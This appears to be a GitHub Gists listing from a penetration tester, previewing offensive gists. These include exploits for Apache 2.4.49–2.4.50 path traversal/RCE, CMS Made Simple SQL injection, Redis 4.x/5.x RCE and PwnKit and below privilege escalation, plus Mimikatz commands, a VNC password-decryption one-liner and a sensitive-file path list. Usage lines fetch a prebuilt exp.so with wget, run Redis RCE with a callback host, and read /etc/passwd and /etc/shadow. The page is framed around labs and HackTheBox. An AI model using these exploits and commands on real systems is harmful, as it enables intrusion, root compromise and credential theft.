:shipit:
Imposter Syndrome

$tr!k0d3r strikoder

#!/usr/bin/python3
# Author: Ravin | Blacknote
# Link: https://github.com/blackn0te/Apache-HTTP-Server-2.4.49-2.4.50-Path-Traversal-Remote-Code-Execution/blob/main/exploit.py
# CVE-2021-41773 | CVE-2021-42013
# Apache HTTP Server 2.4.49-2.4.50 - Path Traversal & Remote Code Execution
# Usage:
# in some cases, reading files or rce might fail, so try both of them
# python3 Apache-2.4.49-2.4.50 127.0.0.1 8080 rce 'id'
# python3 Apache-2.4.49-2.4.50 127.0.0.1 8080 file '/etc/passwd'
strikoder / cmsms_2.2.9_sqli.py
Created October 23, 2025 17:30
cmsms 2.2.9 exploit (CVE-2019-9053)
#!/usr/bin/env python3
# Exploit Title: Unauthenticated SQL Injection on CMS Made Simple <= 2.2.9
# Original-Date: 30-03-2019
# Exploit Author: Daniele Scanu @ Certimeter Group (https://gist.github.com/pdelteil/6ebac2290a6fb33eea1af194485a22b1)
# Vendor Homepage: https://www.cmsmadesimple.org/
# Software Link: https://www.cmsmadesimple.org/downloads/cmsms/
# Version: <= 2.2.9
# Tested on: Ubuntu 18.04 LTS
# CVE : CVE-2019-9053
# Usage: python3 cmsms_2.2.9_sqli.py -u http://$IP/simple/ -w /usr/share/seclists/Passwords/Common-Credentials/best110.txt -c
strikoder / Redis RCE 4.x, 5.x (port 6379).sh
Last active December 25, 2025 08:27
Redis 4.x/5.x RCE - port 6379 (<=5.0.9) Exploit
# First, install this .so
```
wget -O exp.so https://github.com/strikoder/OffensiveSecurity/raw/refs/heads/main/CVES/exp.so
```
# Then save the following Python file as payload.py (source: https://github.com/Ridter/redis-rce/blob/master/redis-rce.py)
# and run it (try other ports if 80 didn't work):
# python3 payload.py --rhost 192.168.209.176 --lhost 192.168.45.238 --lport 80 --rport 6379 --file exp.so
```payload.py
#!/usr/bin/env python
```
strikoder / Mimikatz commands
Created November 1, 2025 16:41
Mimikatz basic commands tested on a home-made lab
################################################################################
# Mimikatz — Quick Commands & Explanations (lab: `pentest.local`)
# Video's Link: https://youtu.be/XPxqZFaC0xE
# Lab assumptions: domain `pentest.local`, DC `LAB-DC`, hosts `LAB-FINANCE`, `LAB-MEDIA`.
# Run Mimikatz as Administrator / SYSTEM and use the x64 build on x64 hosts.
################################################################################
## BASICS — setup & checks
# show mimikatz version (verify x64 build)
mimikatz # version
strikoder / vnc password decryption
Created November 15, 2025 06:22
Vnc Password Decryption (hex to clear pass)
# check HTB [Cascade](https://www.hackthebox.com/machines/cascade) for more info
# Step 1: get your VNC password (e.g. 6b,cf,2a,4b,6e,5a,ca,0f)
# Step 2: remove the commas => 6bcf2a4b6e5aca0f
# Step 3: use this one-liner
```bash
# replace 6bcf2a4b6e5aca0f with the value from step 2
echo -n 6bcf2a4b6e5aca0f | xxd -r -p | openssl enc -des-cbc --nopad --nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d | hexdump -Cv
```
## [More info](https://github.com/frizb/PasswordDecrypts) on VNC
strikoder / popular_nxc_errors.md
Last active December 23, 2025 15:18
Common NetExec (nxc) Kerberos errors and quick fixes
strikoder / below linux privilege escalation(CVE-2025-27591).md
Created November 17, 2025 07:26
CVE-2025-27591 PoC: Below (≤0.8.1) symlink privilege escalation exploit.

Below Privilege Escalation Exploit

Vulnerability Information

Affected Software: below monitoring tool
Vulnerable Versions: <= 0.8.1 (possibly < 0.9.0)
Vulnerability Type: Symlink-based privilege escalation
CVE: CVE-2025-27591-PoC
Source: HackTheBox - Outbound machine

strikoder / CVE-2021-4034: PwnKit - Polkit pkexec Local Privilege Escalation.md
Last active December 21, 2025 10:50
Local privilege escalation exploit for polkit pkexec vulnerability (CVE-2021-4034). Grants root shell on vulnerable Linux systems.

CVE-2021-4034 PwnKit Exploit

Local privilege escalation exploit for polkit pkexec vulnerability (CVE-2021-4034). Grants root shell on vulnerable Linux systems.

Check if Vulnerable

/usr/bin/pkexec --version  # ≤ 0.120
uname -r # 5.3.0-42 5.4.0-107 OR cat /etc/issue
ls -la /usr/bin/pkexec      # Should have SUID bit
strikoder / Windows & Linux File Paths Reference.md
Last active December 1, 2025 20:29
Windows & Linux sensitive file paths for penetration testing - includes webroot locations, config files, logs, and SQL injection LOAD_FILE payloads for common services (IIS, Apache, Nginx, XAMPP, WAMP, Jenkins, FTP, SSH)

Linux & Windows Sensitive Paths Cheatsheet

LINUX

Files

/etc/passwd
/etc/shadow
/etc/profile
/etc/issue
strikoder / notion-clean-sidebar.css
Created December 1, 2025 07:17
Clean Notion Sidebar - Remove default navigation items, workspace switcher, and dividers for a minimal sidebar experience
/*
* Clean Notion Sidebar
* Removes default navigation items and workspace switcher for a cleaner look
*
* How to use:
* 1. Install Stylus extension (Chrome/Firefox/Edge)
* 2. Create new style in Stylus
* 3. Copy and paste this CSS
* 4. Set to apply to domain: notion.so
* 5. Save and refresh Notion